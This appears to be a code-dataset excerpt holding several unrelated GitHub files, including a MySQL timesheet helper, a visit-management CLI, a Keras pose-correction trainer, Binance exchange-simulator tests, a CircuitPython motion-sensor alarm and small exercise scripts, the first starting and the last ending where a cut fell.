= [i[0] for i in results]\n return results\n \n def bulk_query(self, query):\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n return results\n \n # Used to add testing data to database\n def add(self):\n # sql1 = \"INSERT INTO rides (userID, driverID, pickupLoc, dropLoc, RideRating) VALUES (%s, %s, %s, %s, %s)\"\n\n # vals = [\n # (\"222\", \"333\", \"Coruscant\", \"Alderaan\", \"5\"),\n # (\"444\", \"666\", \"Raada\", \"Hoth\", \"3\"),\n # (\"555\", \"333\", \"Tatooine\", \"Death Star\", \"4\")\n # ]\n\n # sql1 = \"INSERT INTO teachers (teachID, locID, FirstName, LastName) VALUES (%s, %s, %s, %s)\"\n\n # vals = [\n # (\"1\", \"2\", \"Nathan\", \"Nguyen\"),\n # (\"2\", \"2\", \"John\", \"Dang\"),\n # (\"3\", \"1\", \"Gage\", \"Banzon\"),\n # (\"4\", \"3\", \"Olivia\", \"Chilvers\")\n # ]\n\n # sql2 = \"INSERT INTO schools (locID, Name) VALUES (%s, %s)\"\n\n # vals2 = [\n # (\"1\", \"Beacon Park\"),\n # (\"2\", \"Brywood\"),\n # (\"3\", \"Stonecreek\"),\n # ]\n\n sql3 = \"INSERT INTO timesheets (teachID, entryID, timesheetID) VALUES (%s, %s, %s)\"\n\n vals3 = [\n (\"1\", \"1\", \"1\"),\n (\"2\", \"2\", \"2\"),\n (\"3\", \"3\", \"3\"),\n (\"4\", \"4\", \"4\")\n ]\n\n # sql4 = \"INSERT INTO entry (entryID, timeIn, timeOut, timesheetID) VALUES (%s, %s, %s, %s)\"\n\n # date1 = datetime.datetime(2022, 7, 13, 7, 12, 0)\n # date1.strftime('%Y-%M-%D %H:%M:%S')\n # date2 = datetime.datetime(2022, 7, 13, 7, 20, 
0)\n # date2.strftime('%Y-%M-%D %H:%M:%S')\n # date3 = datetime.datetime(2022, 7, 14, 7, 0, 0)\n # date3.strftime('%Y-%M-%D %H:%M:%S')\n # date4 = datetime.datetime(2022, 7, 17, 7, 30, 0)\n # date4.strftime('%Y-%M-%D %H:%M:%S')\n\n # date5 = datetime.datetime(2022, 7, 13, 15, 15, 0)\n # date5.strftime('%Y-%M-%D %H:%M:%S')\n # date6 = datetime.datetime(2022, 7, 13, 15, 13, 0)\n # date6.strftime('%Y-%M-%D %H:%M:%S')\n # date7 = datetime.datetime(2022, 7, 14, 15, 4, 0)\n # date7.strftime('%Y-%M-%D %H:%M:%S')\n # date8 = datetime.datetime(2022, 7, 17, 15, 30, 0)\n # date8.strftime('%Y-%M-%D %H:%M:%S')\n\n # vals4 = [\n # (\"1\", date1, date5, \"1\"),\n # (\"2\", date2, date6, \"2\"),\n # (\"3\", date3, date7, \"3\"),\n # (\"4\", date4, date8, \"4\")\n # ]\n\n # sql5 = \"INSERT INTO students (studID, grade, teachID, FirstName, LastName) VALUES (%s, %s, %s, %s, %s)\"\n\n # vals5 = [\n # (\"1\", \"5\", \"1\", \"Adrian\", \"Atlas\"),\n # (\"2\", \"5\", \"1\", \"Britney\", \"Book\"),\n # (\"3\", \"5\", \"1\", \"Chloe\", \"Claus\"),\n # (\"4\", \"5\", \"1\", \"Darian\", \"Deck\"),\n # (\"5\", \"5\", \"1\", \"Edward\", \"Edison\"),\n # (\"6\", \"6\", \"2\", \"Felicity\", \"Farm\"),\n # (\"7\", \"6\", \"2\", \"George\", \"Gold\"),\n # (\"8\", \"6\", \"2\", \"Heather\", \"Hill\"),\n # (\"9\", \"6\", \"2\", \"Isabelle\", \"Isotope\"),\n # (\"10\", \"6\", \"2\", \"Jason\", \"Jack\"),\n # (\"11\", \"3\", \"3\", \"Keath\", \"King\"),\n # (\"12\", \"3\", \"3\", \"Lily\", \"Lover\"),\n # (\"13\", \"3\", \"3\", \"Monique\", \"Monty\"),\n # (\"14\", \"3\", \"3\", \"Nicholas\", \"Nelson\"),\n # (\"15\", \"4\", \"4\", \"Opal\", \"Owen\"),\n # (\"16\", \"4\", \"4\", \"Patrick\", \"Pill\"),\n # (\"17\", \"4\", \"4\", \"Quirin\", \"Quill\"),\n # (\"18\", \"4\", \"4\", \"Rachel\", \"Rome\"),\n # (\"19\", \"4\", \"4\", \"Seth\", \"Soap\"),\n # (\"20\", \"4\", \"4\", \"Trevor\", \"Trick\")\n # ]\n\n # self.cursor.executemany(sql1, vals)\n # mydb.commit()\n # print(\"query executed...\")\n # self.cursor.executemany(sql2, vals2)\n # mydb.commit()\n # print(\"query executed...\")\n self.cursor.executemany(sql3, vals3)\n mydb.commit()\n print(\"query executed...\")\n # self.cursor.executemany(sql4, vals4)\n # mydb.commit()\n # print(\"query executed...\")\n # self.cursor.executemany(sql5, vals5)\n # mydb.commit()\n # print(\"query executed...\")\n\n \n\n # Creates timesheets table \n def create_timesheets_table(self):\n query = '''\n CREATE TABLE timesheets(\n teachID VARCHAR(20) NOT NULL,\n entryID INT NOT NULL,\n timesheetID INT NOT NULL PRIMARY KEY\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n \n # Creates entry table\n def create_entry_table(self):\n query = '''\n CREATE TABLE entry(\n entryID INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n timeOut DATETIME NOT NULL,\n timeIn DATETIME NOT NULL,\n timesheetID INT NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n\n # Create teachers table\n def create_teachers_table(self):\n query = '''\n CREATE TABLE teachers(\n teachID VARCHAR(20) NOT NULL PRIMARY KEY,\n locID INT NOT NULL,\n FirstName VARCHAR(20) NOT NULL,\n LastName VARCHAR(20) NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n\n # Create teachers table\n def create_schools_table(self):\n query = '''\n CREATE TABLE schools(\n locID INT NOT NULL PRIMARY KEY,\n Name VARCHAR(20) NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n \n # Create teachers table\n def create_students_table(self):\n query = '''\n CREATE TABLE 
students(\n studID VARCHAR(20) NOT NULL PRIMARY KEY,\n grade INT NOT NULL,\n teachID INT NOT NULL,\n FirstName VARCHAR(20),\n LastName VARCHAR(20) NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n\n # close connection\n def destructor(self):\n try:\n mydb.close()\n except:\n print(\"CLOSE CONNECTION FAILED.\")\n\n","repo_name":"nnguyen641/timesheet-database","sub_path":"sql_operations.py","file_name":"sql_operations.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20206041910","text":"# vms/app/visits.py\nimport click\nfrom models import Visit,Visitor,Office, session\nfrom datetime import datetime # Import datetime for current date and time\n\n@click.group()\ndef visits():\n \"\"\"Manage visits.\"\"\"\n pass\n\n@visits.command()\n@click.option('--person-visited', prompt='Enter person visited', help='Person visited')\n@click.option('--visitor-id', type=int, prompt='Enter visitor ID', help='Visitor ID')\n@click.option('--office-id', type=int, prompt='Enter office ID', help='Office ID')\ndef add(person_visited, visitor_id, office_id):\n \"\"\"Add a visit.\"\"\"\n # Check if the provided visitor_id and office_id exist in their respective tables\n visitor = session.query(Visitor).filter_by(visitor_id=visitor_id).first()\n office = session.query(Office).filter_by(office_id=office_id).first()\n\n if not visitor:\n click.echo(f\"Visitor with ID {visitor_id} not found.\")\n return\n if not office:\n click.echo(f\"Office with ID {office_id} not found.\")\n return\n\n # Get the current date and time\n current_datetime = datetime.now()\n\n # Create the visit record with the provided visitor_id and office_id\n visit = Visit(visitor_id=visitor_id, office_id=office_id, person_visited=person_visited, visit_date=current_datetime)\n session.add(visit)\n session.commit()\n click.echo(\"Visit added.\")\n\n\n@visits.command()\ndef list():\n \"\"\"List all visits.\"\"\"\n visits = session.query(Visit).all()\n click.echo(\"Visits:\")\n for visit in visits:\n click.echo(f\"ID: {visit.visit_id}, Visitor ID: {visit.visitor_id}, Office ID: {visit.office_id}, Person Visited: {visit.person_visited}, Visit Date: {visit.visit_date}\")\n\n\n@visits.command()\n@click.argument('visit_id', type=int)\n@click.option('--person-visited', prompt='Enter updated person visiting', help='Updated person visited')\ndef update(visit_id, person_visited):\n \"\"\"Update a visit by ID.\"\"\"\n visit = session.query(Visit).filter_by(visit_id=visit_id).first()\n if visit:\n visit.person_visited = person_visited\n session.commit()\n click.echo(f\"Visit with ID {visit_id} updated.\")\n else:\n click.echo(f\"Visit with ID {visit_id} not found.\")\n\n\n@visits.command()\n@click.argument('visit_id', type=int)\ndef delete(visit_id):\n \"\"\"Delete a visit by ID.\"\"\"\n visit = session.query(Visit).filter_by(visit_id=visit_id).first()\n if visit:\n session.delete(visit)\n session.commit()\n click.echo(f\"Visit with ID {visit_id} deleted.\")\n else:\n click.echo(f\"Visit with ID {visit_id} not found.\")\n\n\n@visits.command()\n@click.argument('visit_id', type=int)\ndef search(visit_id):\n \"\"\"Search for a visit by ID using binary search.\"\"\"\n visits = session.query(Visit).all()\n \n # Binary search to find the visit by ID\n left, right = 0, len(visits) - 1\n while left <= right:\n mid = (left + right) // 2\n if visits[mid].visit_id == visit_id:\n click.echo(f\"Visit found - ID: {visits[mid].visit_id}, Visitor 
ID: {visits[mid].visitor_id}, Office ID: {visits[mid].office_id}, Person visited: {visits[mid].person_visited}\")\n            return\n        elif visits[mid].visit_id < visit_id:\n            left = mid + 1\n        else:\n            right = mid - 1\n\n    click.echo(f\"Visit with ID {visit_id} not found.\")\n","repo_name":"muthuieric/VMS-CLI","sub_path":"vms/visits.py","file_name":"visits.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2970135912","text":"\"\"\"\npretrained model\n\"\"\"\n\nimport glob\n\nfrom tensorflow import keras\nimport cv2\nimport poselib\nimport numpy as np\nfrom tqdm import tqdm\n\ncache_dir = \"cache/\"\n\ndef get_video_as_frames(video_path):\n    capture = cv2.VideoCapture(video_path)\n    while True:\n        retval, frame = capture.read()\n        if not retval:\n            return\n        yield frame\n\ndef get_model():\n    L = keras.layers\n    seq = keras.models.Sequential()\n    seq.add(L.ConvLSTM2D(filters=5, kernel_size=(3, 3),\n                         input_shape=(None, 17, 3, 1),\n                         padding='same', return_sequences=True, activation='relu'))\n\n    seq.add(L.Conv3D(filters=1, kernel_size=(3, 3, 3),\n                     activation='relu',\n                     padding='same', data_format='channels_last'))\n\n    seq.compile(loss='mae', optimizer='adam', metrics=['mae', 'mse'])\n\n    return seq\n\ndef create_sequence(poses, context_length):\n    pose_batches = []\n    for i in range(len(poses) - context_length):\n        slice = poses[i:i + context_length]\n        pose_batches.append(slice)\n\n    pose_batches = np.asarray(pose_batches)\n    return pose_batches\n\n\ndef lr_schedule():\n    def lrs(epoch):\n        lr = 0.0002\n        if epoch >= 1: lr = 0.0001\n        if epoch >= 5: lr = 0.00005\n        if epoch >= 10: lr = 0.00001\n        return lr\n    return keras.callbacks.LearningRateScheduler(lrs, verbose=True)\n\ndef checkpoint(path):\n    cp = keras.callbacks.ModelCheckpoint(filepath=path,\n                                         monitor='val_loss',\n                                         save_best_only=True,\n                                         verbose=1)\n    return cp\n\ndef train(videos, output):\n    accurate_detector_name = 'openpose'\n    fast_detector_name = 'tpu'\n\n    accurate_detector = poselib.PoseDetector(accurate_detector_name)\n    fast_detector = poselib.PoseDetector(fast_detector_name)\n\n    cache = get_cache()\n\n    all_acc_poses = []\n    all_fas_poses = []\n\n    for video in videos:\n        acc_name = video.split(\"/\")[-1].split(\".\")[0] + accurate_detector_name\n        fas_name = video.split(\"/\")[-1].split(\".\")[0] + fast_detector_name\n        if acc_name in cache and fas_name in cache:\n            acc_poses = cache[acc_name]\n            fas_poses = cache[fas_name]\n        else:\n            acc_poses = []\n            fas_poses = []\n            for frame in tqdm(get_video_as_frames(video)):\n                pacc = get_pose(accurate_detector, frame)\n                pfast = get_pose(fast_detector, frame)\n                if pacc is None or pfast is None:\n                    continue\n                acc_poses.append(pacc)\n                fas_poses.append(pfast)\n\n            acc_poses = np.asarray(acc_poses)\n            fas_poses = np.asarray(fas_poses)\n\n            set_cache(acc_name, acc_poses)\n            set_cache(fas_name, fas_poses)\n\n        all_acc_poses.append(acc_poses)\n        all_fas_poses.append(fas_poses)\n\n    model = get_model()\n    print(model.summary())\n    accurate_poses = []\n    fast_poses = []\n\n    context_length = 5\n    for acc, fas in zip(all_acc_poses, all_fas_poses):\n        pa = create_sequence(acc, context_length)\n        pf = create_sequence(fas, context_length)\n\n        accurate_poses.extend(pa)\n        fast_poses.extend(pf)\n\n    fast_poses = np.expand_dims(np.asarray(fast_poses), axis=-1)\n    accurate_poses = np.expand_dims(np.asarray(accurate_poses), axis=-1)\n\n    cp = checkpoint(\"../weights/kalman_model.hdf5\")\n
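    # Editorial note (added): the model built by get_model() above appears to be used\n    # only for its summary; loading the checkpoint below resumes training from the\n    # previously saved weights rather than from scratch.\n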
    model = keras.models.load_model(\"../weights/kalman_model.hdf5\")\n    callbacks = [lr_schedule(), cp]\n    model.fit(fast_poses,\n              accurate_poses,\n              epochs=100,\n              validation_split=0.2, callbacks=callbacks)\n\ndef get_cache():\n    cache = {}\n    for fname in glob.glob(cache_dir + \"*.npy\"):\n        var_name = fname.split(\"/\")[-1].split(\".\")[0]\n        cache[var_name] = np.load(fname)\n    return cache\n\ndef set_cache(var_name, arr):\n    fname = cache_dir + var_name + \".npy\"\n    np.save(fname, arr)\n\nclass PoseCorrector:\n    def __init__(self, model_path):\n        self.model = keras.models.load_model(model_path)\n\n    def update(self, pose):\n        pose = np.expand_dims(pose, axis=-1)\n        predicted = self.model.predict(pose)\n        return predicted\n\n\nif __name__ == \"__main__\":\n    import argparse\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--videos\", default=None, required=True)\n    parser.add_argument(\"--output\", default=None, required=True)\n    args = parser.parse_args()\n    video_paths = glob.glob(args.videos + \"*.*\")\n    print(video_paths)\n    train(video_paths, args.output)","repo_name":"4g/dhs2019","sub_path":"src/kalman_pose.py","file_name":"kalman_pose.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16646114650","text":"# 23/03/28\n# https://leetcode.cn/problems/reverse-string/submissions/\n\nfrom typing import List\n\n# two pointers\n# ✅\n\ndef reverseString(s: List[str]) -> None:\n    \"\"\"\n    Do not return anything, modify s in-place instead.\n    \"\"\"\n\n    leftPointer, rightPointer = 0, len(s) - 1\n\n    while leftPointer < rightPointer:\n        s[leftPointer], s[rightPointer] = s[rightPointer], s[leftPointer]\n        leftPointer += 1\n        rightPointer -= 1","repo_name":"Syueying/LeetCodeDaily","sub_path":"字符串/1. 
反转字符串 - 344/Reverse String.py","file_name":"Reverse String.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9831481249","text":"from flask import Flask\n\nfrom controllers.indexController import index\nfrom controllers.testsController import tests_page, console_input\nfrom controllers.loginController import login, logout\n\n\ndef app_register_routes(app: Flask):\n routes = {\n '/': ('index', index, ['GET']),\n '/login': ('login', login, ['POST', 'GET']),\n '/logout': ('logout', logout, ['POST', 'GET']),\n '/tests': ('tests', tests_page, ['POST', 'GET']),\n\n\n '/tests/command': ('tests_command', console_input, ['POST'])\n\n }\n\n for route, (endpoint, view_func, methods) in routes.items():\n app.add_url_rule(route, endpoint, view_func, methods=methods)\n\n","repo_name":"FerrenF/fletsync","sub_path":"bootstrap/appRegisterRoutes.py","file_name":"appRegisterRoutes.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3152372563","text":"import logging\nimport unittest\nfrom unittest import mock\nimport json\n\nfrom binance_api import api, balance_handler, rdb\n\n\nclass TestBinanceAPI(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n logging.disable(logging.CRITICAL)\n balance_handler.deposit('api_key', 'omg', 10, 'available')\n cls.app = api.test_client()\n cls.headers = {\n \"X-MBX-APIKEY\": \"api_key\"\n }\n\n @classmethod\n def tearDownClass(cls):\n rdb.delete('balance_api_key_available')\n rdb.delete('balance_api_key_lock')\n\n def test_missing_key_for_authenticated_end_point(self):\n \"\"\"\n expect error message appears in response\n \"\"\"\n resp = self.app.get('/api/v3/account', headers={}, data={})\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.data.decode(), str({\n 'code': -2015,\n 'msg': 'Invalid read-key, API-key, and/or IP.'\n }))\n\n def test_get_depth_without_symbol(self):\n resp = self.app.get(\n '/api/v1/depth', headers=self.headers, data={})\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.data.decode(), str({\n 'code': -1102,\n 'msg': \"Mandatory parameter 'symbol' was not sent, \"\n \"was empty/null, or malformed.\"\n }))\n\n def test_get_depth_with_invalid_symbol(self):\n resp = self.app.get('/api/v1/depth?symbol=invalid_token',\n headers=self.headers, data={})\n self.assertEqual(resp.status_code, 200)\n self.assertRegex(resp.data.decode(), 'Invalid pair')\n\n def test_get_depth_with_valid_symbol(self):\n resp = self.app.get('/api/v1/depth?symbol=OMGETH',\n headers=self.headers, data={})\n self.assertEqual(resp.status_code, 200)\n ob = json.loads(resp.data)\n self.assertListEqual(list(ob.keys()), ['asks', 'bids', 'lastUpdateId'])\n\n def test_get_balance(self):\n resp = self.app.get('/api/v3/account',\n headers=self.headers, data={})\n balance = json.loads(resp.data)\n self.assertIn('balances', balance)\n\n def test_open_order(self):\n data = {\n 'symbol': 'OMGETH',\n 'quantity': '10',\n 'price': '0.00001',\n 'side': 'SELL'\n }\n resp = self.app.post('/api/v3/order',\n headers=self.headers, query_string=data)\n result = json.loads(resp.data)\n self.assertIn('orderId', result)\n\n def test_get_open_orders(self):\n query = {'symbol': 'OMGETH'}\n resp = self.app.get('/api/v3/openOrders',\n headers=self.headers, query_string=query)\n result = json.loads(resp.data)\n self.assertIsInstance(result, list)\n\n def 
test_cancel_order(self):\n # this one will stay in open orders\n data = {\n 'symbol': 'OMGETH',\n 'quantity': '10',\n 'price': '1', # bad price\n 'side': 'SELL'\n }\n resp = self.app.post('/api/v3/order',\n headers=self.headers, query_string=data)\n result = json.loads(resp.data)\n\n query = {'symbol': 'OMGETH', 'orderId': result['orderId']}\n resp = self.app.delete('/api/v3/order',\n headers=self.headers, query_string=query)\n result = json.loads(resp.data)\n self.assertIn('orderId', result)\n\n def _mock_withdraw(*args, **kargs):\n return \"tx_id\"\n\n @mock.patch('simulator.exchange.Exchange.withdraw', _mock_withdraw)\n def test_withdraw(self):\n query = {\n 'address': '0xc7159686de47f2ca06fcd1e74d1b9a1a0e584259',\n 'asset': 'omg',\n 'amount': '1'\n }\n resp = self.app.post('/wapi/v3/withdraw.html',\n headers=self.headers, query_string=query)\n result = json.loads(resp.data)\n self.assertEqual(result['msg'], 'success')\n\n def test_withdraw_history(self):\n resp = self.app.get('/wapi/v3/withdrawHistory.html',\n headers=self.headers)\n result = json.loads(resp.data)\n self.assertIn('withdrawList', result)\n\n def test_deposit_history(self):\n resp = self.app.get('/wapi/v3/depositHistory.html',\n headers=self.headers)\n result = json.loads(resp.data)\n self.assertIn('depositList', result)\n","repo_name":"KyberNetwork/exchange-simulator","sub_path":"tests/test_binance_api.py","file_name":"test_binance_api.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"72"} +{"seq_id":"6864459577","text":"from PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QAction, QActionGroup, QMenu\n\nimport parce.registry\n\n\n\nclass LanguageMenuAction(QAction):\n \"\"\"A QAction that shows a section-based submenu for all languages in the/a\n parce :class:`~parce.registry.Registry`.\n\n \"\"\"\n lexicon_changed = pyqtSignal(object)\n \"\"\"This signal is emitted when a language is selected by the user.\n\n The single argument is a :class:`~parce.lexicon.Lexicon` or None.\n\n \"\"\"\n\n def __init__(self, parent=None, registry=None):\n super().__init__(parent)\n self._registry = None\n self._actionGroup = QActionGroup(self, triggered=self._slot_language_selected)\n self.setMenu(QMenu(\"\", None))\n self.set_registry(registry or parce.registry.registry)\n\n def set_registry(self, registry):\n \"\"\"Set the :class:`~parce.registry.Registry` and populate ourselves\n with the lexicons from the registry.\n\n \"\"\"\n self._registry = registry\n self._populate()\n\n def registry(self):\n \"\"\"Return the currently set Registry.\"\"\"\n return self._registry\n\n def display_name(self, qualname):\n \"\"\"Return the text to display for the ``qualname``.\n\n By default the desc and the name between parentheses from the\n registry's entry is returned. 
If the qualname is None or the empty\n string, returns ``\"None\"``.\n\n \"\"\"\n if qualname:\n entry = self.registry()[qualname]\n return \"{0.desc} ({0.name})\".format(entry)\n return \"None\"\n\n def set_lexicon(self, lexicon):\n \"\"\"Set the current lexicon, or None.\"\"\"\n for a in self._actionGroup.findChildren(QAction):\n if ((lexicon and a.objectName() == lexicon.qualname) or\n (not lexicon and not a.objectName())):\n a.setChecked(True)\n return\n a = self._actionGroup.checkedAction()\n if a:\n a.setChecked(False)\n\n def lexicon(self):\n \"\"\"Return the current lexicon.\"\"\"\n a = self._actionGroup.checkedAction()\n if a:\n qualname = a.objectName()\n if qualname:\n r = self.registry()\n return r.lexicon(qualname)\n\n def _slot_language_selected(self, action):\n \"\"\"Called when an action is triggered.\"\"\"\n qualname = action.objectName()\n lexicon = self.registry().lexicon(qualname) if qualname else None\n self.lexicon_changed.emit(lexicon)\n\n def _populate(self):\n \"\"\"Called to fill ourselves with submenus from the registry.\"\"\"\n g = self._actionGroup\n m = self.menu()\n for a in g.findChildren(QAction):\n a.setParent(None)\n a.deleteLater()\n actions = m.actions()\n insert_before = None\n if not actions:\n # menu is empty\n a = QAction(g, text=\"&None\", objectName=\"\", checkable=True, checked=True)\n m.addAction(a)\n m.addSeparator()\n else:\n # make it empty\n for index, a in enumerate(actions):\n if a.objectName() == \"sect_submenu\":\n insert_before = a\n break\n else:\n if len(actions) > 2:\n insert_before = actions[2]\n reg = self.registry().by_section()\n for sect in sorted(reg):\n if sect:\n submenu = QMenu()\n a = QAction(sect, m, objectName=\"sect_submenu\")\n a.setMenu(submenu)\n m.insertAction(insert_before, a) if insert_before else m.addAction(a)\n entries = sorted((self.display_name(qualname), qualname) for qualname in reg[sect].keys())\n for name, qualname in entries:\n submenu.addAction(QAction(g, text=name, objectName=qualname, checkable=True))\n # old items left?\n if actions and index:\n for a in actions[index:]:\n if a.objectName() == \"sect_submenu\":\n a.setParent(None)\n a.deleteLater()\n\n","repo_name":"wbsoft/parceqt","sub_path":"parceqt/gadgets/languagemenuaction.py","file_name":"languagemenuaction.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33042630446","text":"#remember to add status\nimport time\nimport board\nimport neopixel\nimport random\nimport digitalio as dio\nimport adafruit_hcsr04\n\n#Mario defined the variables and inputs/outputs\nnum_pixels = 30\nnp = neopixel.NeoPixel(board.D2, num_pixels, auto_write = False, brightness = 1)\n\nDISARMED = 0\nARMED = 1\nARMING = 2\n\npir = dio.DigitalInOut(board.D3)\npir.direction = dio.Direction.INPUT\n\nsonar = adafruit_hcsr04.HCSR04(trigger_pin=board.D4, echo_pin=board.D5)\n\nbb = dio.DigitalInOut(board.D6)\nbb.direction = dio.Direction.INPUT\nbb.pull = dio.Pull.UP\n\nbutton = dio.DigitalInOut(board.D7)\nbutton.direction = dio.Direction.INPUT\narm = button\n\nbutton2 = dio.DigitalInOut(board.D8)\nbutton2.direction = dio.Direction.INPUT\ndisarm = button2\n\nred = (255, 0, 0)\nblack = (0,0,0)\nwhite = (255,255,255)\nblue = (0,0,255)\ngreen = (0,255,0)\npurple = (255,0,255)\nyellow = (255, 100, 0)\norangeT = (255, 80, 0)\norange = (255, 64, 0)\nlightBlue = (87, 232, 255)\nlightpurple = (227, 98, 255)\ndarkpurple = (18,0,18)\ndefaultcolor = [216, 231, 0]\nstatus = DISARMED\n#Mario 
defined the variables and inputs/outputs\n\n#Yency did the Functions\n'''\nFunction: fade_out\n\nDescription: This function begins with a color and fades to black\n\nParameters: defcolor(list), delay(float)\n\nReturn value: Prints the color values as they update\n'''\ndef fade_out(defaultcolor, delay = 0.005):\n fadeR = defaultcolor[0]/256.0\n fadeG = defaultcolor[1]/256.0\n fadeB = defaultcolor[2]/256.0\n for i in range(256):\n color1[0] = int (defaultcolor[0] - (fadeR*i))\n color1[1] = int (defaultcolor[1] - (fadeG*i))\n color1[2] = int (defaultcolor[2] - (fadeB*i))\n np.fill(color1)\n print(i, defaultcolor,fadeR*i,fadeG*i,fadeB*i)\n time.sleep(delay)\n np.show()\n\n'''\nFunction: fade_in\n\nDescription: This function begins with a black and fades in to a color\n\nParameters: defcolor(list), delay(float)\n\nReturn value: Prints the color values as they update\n'''\ndef fade_in(defaultcolor, delay = 0.005):\n fadeR = defaultcolor[0]/256.0\n fadeG = defaultcolor[1]/256.0\n fadeB = defaultcolor[2]/256.0\n for i in range(256):\n color1[0] = int (fadeR*i)\n color1[1] = int (fadeG*i)\n color1[2] = int (fadeB*i)\n np.fill(color1)\n print(i, defaultcolor,fadeR*i,fadeG*i,fadeB*i)\n time.sleep(delay)\n np.show()\n\ncolor1 = [defaultcolor[0],defaultcolor[1],defaultcolor[2]]\nnp.fill(color1)\n\n'''\nFunction: disarmed\n\nDescription: This function changes the LED color to green to show the system is disarmed.\n\n\nReturn value: np.show()\n'''\ndef disarmed():\n np.fill(green)\n np.show()\n'''\nFunction: arming\n\nDescription: This function changes the LED color to yellow to show the system is arming.\n\n\nReturn value: np.show() & print(status)\n'''\ndef arming():\n np.fill(yellow)\n np.show()\n status = ARMING\n print(status)\n time.sleep(10)\n '''\nFunction: armed\n\nDescription: This function changes the LED color to red to show the system is armed.\n\n\nReturn value: np.show()\n'''\ndef armed():\n np.fill(red)\n np.show()\n#Yency did the Functions\n\n#Jaidyn created the base code, the entire group extened the code=\nwhile True:\n if disarm.value != True:\n disarmed()\n status = DISARMED\n print(status)\n print(arm.value)\n\n if arm.value != True:\n arming()\n armed()\n status = ARMED\n print(status)\n\n if status == 1 and not bb.value:\n print(\"Beam is broken!, Triggering!\")\n for i in range(30):\n fade_out(red)\n fade_in(red)\n armed()\n\n elif status == 1 and pir.value:\n print(\"Motion Detected, Triggering!\")\n for i in range(10):\n fade_out(red)\n fade_in(red)\n armed()\n \n try:\n if status == 1 and sonar.distance <= 150:\n print(\"Triggered!\")\n for i in range(10):\n fade_out(red)\n fade_in(red)\n armed()\n\n except RuntimeError:\n armed()\n#Jaidyn created the base code, the entire group extened the code\n","repo_name":"FCHS-CS/YMJ","sub_path":"Security Project.py","file_name":"Security Project.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70273328554","text":"'''\n Melhore o jogo do desafio 28 onde o computador vai 'pensar' em um numero de 0 a 10\n onde o jogador vai chutando valores e quando acertar mostre a quantidade de chutes\n'''\nfrom math import e\nimport random\n\nprint('= ' * 6 + '' + ' =' * 6)\n\nnumero_chutes = 0\ntentativa = True\nnumero = random.randrange(0, 11)\nwhile tentativa:\n chute = int(input('Chute um número de 0 a 10: '))\n if numero == chute:\n print('ACERTOU!!!')\n tentativa = False\n else:\n numero_chutes += 1\n print('ERROU')\n\nprint('= ' * 
15)","repo_name":"LuccaSantos/curso-em-video-python3","sub_path":"Desafios/modulo02/def58.py","file_name":"def58.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74824727272","text":"from pathlib import Path\nimport torch\nimport cv2\nimport numpy as np\nimport math\nfrom typing import Union, List, Optional\n# import skimage.metrics as metrics\n\n\ndef read_image(path: Path, grayscale: bool = False) -> np.ndarray:\n \"\"\"Read an image from path as RGB or grayscale\"\"\"\n mode = cv2.IMREAD_GRAYSCALE if grayscale else cv2.IMREAD_COLOR\n image = cv2.imread(str(path), mode)\n if image is None:\n raise IOError(f'Could not read image at {path}.')\n if not grayscale:\n image = image[..., ::-1]\n return image\n\n\ndef numpy_image_to_torch(image: np.ndarray) -> torch.Tensor:\n \"\"\"Normalize the image tensor and reorder the dimensions.\"\"\"\n if image.ndim == 3:\n image = image.transpose((2, 0, 1)) # HxWxC to CxHxW\n elif image.ndim == 2:\n image = image[None] # add channel axis\n else:\n raise ValueError(f'Not an image: {image.shape}')\n return torch.tensor(image / 255., dtype=torch.float)\n\n\ndef resize_image(image: np.ndarray, size: Union[List[int], int],\n fn: str, interp: Optional[str] = 'area') -> np.ndarray:\n \"\"\"Resize an image to a fixed size, or according to max or min edge.\"\"\"\n h, w = image.shape[:2]\n\n fn = {'max': max, 'min': min}[fn]\n if isinstance(size, int):\n scale = size / fn(h, w)\n h_new, w_new = int(round(h*scale)), int(round(w*scale))\n scale = (w_new / w, h_new / h)\n elif isinstance(size, (tuple, list)):\n h_new, w_new = size\n scale = (w_new / w, h_new / h)\n else:\n raise ValueError(f'Incorrect new size: {size}')\n mode = {\n 'linear': cv2.INTER_LINEAR,\n 'cubic': cv2.INTER_CUBIC,\n 'nearest': cv2.INTER_NEAREST,\n 'area': cv2.INTER_AREA}[interp]\n return cv2.resize(image, (w_new, h_new), interpolation=mode), scale\n\n\ndef load_image(path: Path, grayscale: bool = False, resize: int = None,\n fn: str = 'max', interp: str = 'area') -> torch.Tensor:\n img = read_image(path, grayscale=grayscale)\n scales = [1, 1]\n if resize is not None:\n img, scales = resize_image(img, resize, fn=fn, interp=interp)\n return numpy_image_to_torch(img), torch.Tensor(scales)\n\n\ndef match_pair(extractor, matcher, image0, 